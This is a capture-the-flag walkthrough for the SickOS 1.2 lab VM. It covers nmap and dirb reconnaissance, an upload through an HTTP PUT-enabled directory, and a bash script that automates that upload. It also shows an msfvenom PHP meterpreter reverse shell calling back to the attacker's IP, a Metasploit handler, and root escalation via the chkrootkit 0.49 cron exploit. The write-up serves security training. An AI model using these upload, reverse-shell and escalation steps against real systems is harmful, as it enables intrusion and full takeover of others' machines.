
Hack the SickOS 1.2 VM (CTF Challenge)

In this walkthrough I will explain how to solve the SickOs 1.2 challenge. It is the second VM in the SickOs series and is independent of the earlier release; the goal is to gain the highest privileges (root) on the system. The CTF is a clear model of how an attack on a network is carried out, from discovery to full compromise, in a safe environment.
First, download the SickOs VM and boot it on the same network as your Kali machine.
Start by locating the target on the network with netdiscover:
netdiscover
Our target is 192.168.1.105. Next run a full nmap scan against it (-p- covers all TCP ports, -A adds version detection, OS detection and default scripts):
nmap -A -p- 192.168.1.105

As you can see, port 80 is open, so the target runs a web server. Open the IP in a browser.

Opening the IP in the browser shows the page above, which is of no use, and the page source contains nothing either. So brute-force directories with dirb:
dirb http://192.168.1.105
dirb finds one directory, test. Open it in the browser as well:
192.168.1.105/test/

It shows a directory listing. Next find out which HTTP methods the server accepts for the test directory by sending an OPTIONS request with curl:
curl -v -X OPTIONS http://192.168.1.105/test

The Allow header in the response lists PUT, which means the server will accept a file written into that directory: an upload path.
So prepare the malicious file to upload with msfvenom, using your Kali IP as the listener address:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.113 lport=4444 -f raw

Copy the output from <?php to die() and save it in a file with a .php extension (shell.php here).
To upload the .php file we use the Firefox add-on Poster. Click Tools on the menu bar, then Poster in the drop-down menu.

The dialog below opens. Set the URL to the destination path (http://192.168.1.105/test/shell.php), browse to the file to upload and click PUT.

Poster reports that the file was uploaded.

You can see the same in the browser: the file (shell.php in our case) is now in the test directory.
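The same check and upload can be scripted instead of done through the Poster add-on. The script below is an added example and not part of the original walkthrough: it parses the Allow header of an OPTIONS response, and only if PUT is listed does it push a file with curl and confirm the server serves it back. TARGET and DIR are assumptions matching the lab addresses in the text, and the sample OPTIONS response is constructed, not captured from the VM.

```shell
#!/usr/bin/env bash
# Added example, not code from the original walkthrough: probe a directory for
# the PUT method, upload a file with curl instead of the Poster add-on, and
# confirm the server serves it back. TARGET and DIR are assumptions matching
# the lab addresses used in the text; change them for your own network.
set -u

TARGET="${TARGET:-http://192.168.1.105}"
DIR="${DIR:-/test/}"

# Constructed sample of what `curl -s -D - -o /dev/null -X OPTIONS` returns
# from an Apache directory that accepts PUT (not captured from the VM).
SAMPLE_OPTIONS_RESPONSE=$(printf 'HTTP/1.1 200 OK\r\nDate: Mon, 01 Jan 2018 00:00:00 GMT\r\nServer: Apache\r\nAllow: GET,HEAD,POST,OPTIONS,TRACE,PUT,DELETE\r\nContent-Length: 0\r\n')

# Print the methods from the Allow: header of a raw header block, one per
# line, upper-cased, with CRLF and spaces stripped.
allowed_methods() {
    printf '%s\n' "$1" \
        | tr -d '\r' \
        | awk -F': *' 'tolower($1) == "allow" { print $2 }' \
        | tr ',' '\n' | tr -d ' ' | tr '[:lower:]' '[:upper:]' \
        | grep -v '^$'
}

# Succeed when METHOD ($2, any case) is listed in the header block ($1).
method_allowed() {
    local m
    m=$(printf '%s' "$2" | tr '[:lower:]' '[:upper:]')
    allowed_methods "$1" | grep -qx "$m"
}

# Live version: fetch only the response headers of an OPTIONS request.
probe_options() {
    curl -s -D - -o /dev/null -X OPTIONS "$TARGET$DIR"
}

# PUT a local file into the directory under its own name and print the
# HTTP status code (typically 201 Created for a new file, 204 for a rewrite).
upload_file() {
    local file="$1"
    curl -s -o /dev/null -w '%{http_code}' -T "$file" "$TARGET$DIR$(basename "$file")"
}

# Print the status code of a GET for the uploaded name; 200 means the file
# is reachable, so a PHP payload will execute when it is requested.
verify_upload() {
    curl -s -o /dev/null -w '%{http_code}' "$TARGET$DIR$(basename "$1")"
}

main() {
    local hdrs
    hdrs=$(probe_options)
    echo "Allowed methods for $TARGET$DIR:"
    allowed_methods "$hdrs" | sed 's/^/  /'
    if ! method_allowed "$hdrs" PUT; then
        echo "PUT not allowed here; try another directory" >&2
        return 1
    fi
    echo "PUT upload of $1 -> HTTP $(upload_file "$1")"
    echo "GET $(basename "$1") -> HTTP $(verify_upload "$1")"
}

# Only talk to the network when a file to upload is given, e.g.
#   TARGET=http://192.168.1.105 DIR=/test/ ./put_upload.sh shell.php
if [ "$#" -ge 1 ]; then
    main "$1"
fi
```

Run it from Kali with the generated shell.php as the argument; the GET check at the end tells you whether the file is reachable before you start the handler. Parsing the Allow header rather than just trying PUT keeps the probe quiet and avoids writing to a directory that only appears writable.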
Meanwhile, start Metasploit and set up a handler for the payload:
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.1.113
set lport 4444
exploit
With the handler listening, request the uploaded file in the browser (http://192.168.1.105/test/shell.php). The PHP executes on the server and connects back, giving you a meterpreter session. Drop to a system shell:
shell
The shell has no proper TTY, so upgrade it by spawning bash through Python's pty module:
echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py
Next look for a way to escalate privileges. Start with the OS release, since an old distribution or kernel may have a known local exploit:
lsb_release -a
Nothing in this release is worth exploiting, so leave it alone.
Move on to what the system runs automatically, because scheduled jobs execute as root:
ls -l /etc/cron.daily

The listing shows a daily chkrootkit job. Some versions of chkrootkit are exploitable, so check which one is installed:
chkrootkit -V
It reports version 0.49.
Search for a matching exploit from the Kali terminal:
searchsploit chkrootkit
searchsploit lists the available exploits for it.
Back in Metasploit, return to the msf prompt by backgrounding the meterpreter session and confirm it is still listed, then search for the module:
search chkrootkit
The module is exploit/unix/local/chkrootkit. Load it and run show options to see what it needs; only the session and the listening port have to be set:
use exploit/unix/local/chkrootkit
show options
set session 1
set lport 8080
exploit
The module plants a file that the vulnerable chkrootkit executes as root and then waits for the cron job to run it, so the new session only arrives when that job fires; give it time.
Check whether a second session has come in:
sessions
Once it appears, interact with it:
sessions -i 2
In the new session, check which user you are:
whoami
It says root, so go to the root home directory:
cd /root
List its files:
ls -lsa
There is a text file; read it to finish the challenge:
cat 7d83aaa2bf93d8040f3f22ec6ad9d5a.txt
